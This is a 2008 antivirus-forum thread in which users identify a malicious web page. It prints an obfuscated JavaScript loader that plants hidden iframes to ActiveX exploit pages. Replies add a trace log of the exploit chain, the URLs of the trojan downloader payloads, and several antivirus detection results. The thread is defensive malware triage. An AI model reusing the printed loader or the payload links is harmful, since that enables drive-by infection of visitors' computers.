查看: 2048|回复: 8
收起左侧

[已鉴定] 这个怎么解?

 关闭 [复制链接]
tanlimo
发表于 2008-2-22 20:58:31 | 显示全部楼层 |阅读模式
http://i.79qm.com/dex.htm

  1. window["eval"](function(aAvjSkN1,aoH2,jPL3,CAXXh4,tToFoip5,dLl6){tToFoip5=function(jPL3){return(jPL3<aoH2?'':tToFoip5(window["parseInt"](jPL3/aoH2)))+((jPL3=jPL3
  2. H2)>35?window["String"]["fromCharCode"](jPL3+29):jPL3["toString"](36))};if(!''["replace"](/^/,window["String"])){while(jPL3--){dLl6[tToFoip5(jPL3)]=CAXXh4[jPL3]||tToFoip5(jPL3)}CAXXh4=[function(tToFoip5){return dLl6[tToFoip5]}];tToFoip5=function(){return'G+'};jPL3=1};while(jPL3--){if(CAXXh4[jPL3]){aAvjSkN1=aAvjSkN1["replace"](new window["RegExp"]('2'+tToFoip5(jPL3)+'2','g'),CAXXh4[jPL3])}}return aAvjSkN1}('k m=3 D();j="l";m.E(m.v()+t*s*s*C);k r=3 z(2.p);k n="q=";j="l";k o=r.A(n);2.c('<0 7=6:4 5="8://i.9.b/B.g"></0>');j="l";a(o==-1){j="l";2.p="q=u;x="+m.w();d{a(3 f("y.O"))2.c('<0 7=6:4 5="8://i.9.b/S.g"></0>')}h(e){}d{a(3 f("R.Q"))2.c('<0 7=6:4 5="8://i.9.b/U.V"></0>')}h(e){}d{a(3 f("X.W.1"))2.c('<0 7=6:4 5="8://i.9.b/F.g"></0>')}h(e){}d{a(3 f("e.T.1"))2.c('<0 7=6:4 5="8://i.9.b/P.g"></0>')}h(e){}d{a(3 f("I"))2.c('<0 7=6:4 5="8://i.9.b/H.g"></0>')}h(e){}d{a(3 f("G.J.1"))2.c('<0 7=6:4 5="8://i.9.b/K.g"></0>')}h(e){}d{a(3 f("N.M.1"))2.c('<0 7=6:4 5="8://i.9.b/L.g"></0>')}h(e){}}',60,60,'iframe||document|new|none|src|display|style|http|79qm|if|com|write|try||ActiveXObject|htm|catch||asdfasf|var|fldsajfldsajflas|Then|cookieHeader|beginPosition|cookie|Cookie1|cookieString|60|24|POPWINDOS|getTime|toGMTString|expires|Microsoft|String|indexOf|real|1000|Date|setTime|bf|GLCHAT|cx|Pdg2|GLChatCtrl|lz|db|Tool|BaiduBar|XMLHTTP|pps|Vod|DPClient|Ms06014|PowerPlayerCtrl|xl|html|StormPlayer|MPS'["split"]('|'),0,{}))
复制代码



http://cc.79qm.com/down/max.exe

[ 本帖最后由 tanlimo 于 2008-2-22 21:04 编辑 ]
dikex
发表于 2008-2-22 21:08:34 | 显示全部楼层
window["eval"] = eval
深红的雪
发表于 2008-2-22 21:18:46 | 显示全部楼层
老方法

Log is generated by FreShow.
[wide]http://i.79qm.com/sb.htm
    [frame]http://i.79qm.com/real.htm
        [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/Ms06014.htm
        [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/xl.html
        [object] http://d1.moyugame.com/down/max.exe
    [frame]http://i.79qm.com/bf.htm
        [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/pps.htm
        [frame]http://i.79qm.com/xppps.htm
            [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/cx.htm
        [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/lz.htm
        [object] http://d1.moyugame.com/mm/mm.exe
    [frame]http://i.79qm.com/db.htm
        [object] http://cc.79qm.com/down/max.cab
solcroft
发表于 2008-2-22 21:21:50 | 显示全部楼层
nod32.PNG
qigang
发表于 2008-2-22 21:22:56 | 显示全部楼层
瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.Win32.Edog.o      

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.32.42
spaceplane
发表于 2008-2-22 21:30:58 | 显示全部楼层
BD报下载者
tanlimo
 楼主| 发表于 2008-2-22 21:55:25 | 显示全部楼层

回复 3楼 rappar 的帖子

没想到,我是先ESC再用老方法,所以.......
mofunzone
发表于 2008-2-23 00:07:06 | 显示全部楼层
The file 'C:\TDDOWNLOAD\max.exe'
contained a virus or unwanted program 'TR/Dropper.Gen' [trojan]
Action(s) taken:
The file was deleted!
绅博周幸
发表于 2008-2-23 01:29:45 | 显示全部楼层
ACCESS DENIED
The requested URL could not be retrieved

--------------------------------------------------------------------------------

While trying to retrieve the URL: http://cc.79qm.com/down/max.exe

The folowing error was encountered:

The requested object is INFECTED. The following viruses Worm.Win32.Downloader.eu were found

Please contact your service provider if you feel this is incorrect.



--------------------------------------------------------------------------------

Generated Fri Feb 22 09:29:57 2008 by Kaspersky Internet Security 7.0
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 01:50 , Processed in 0.146338 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表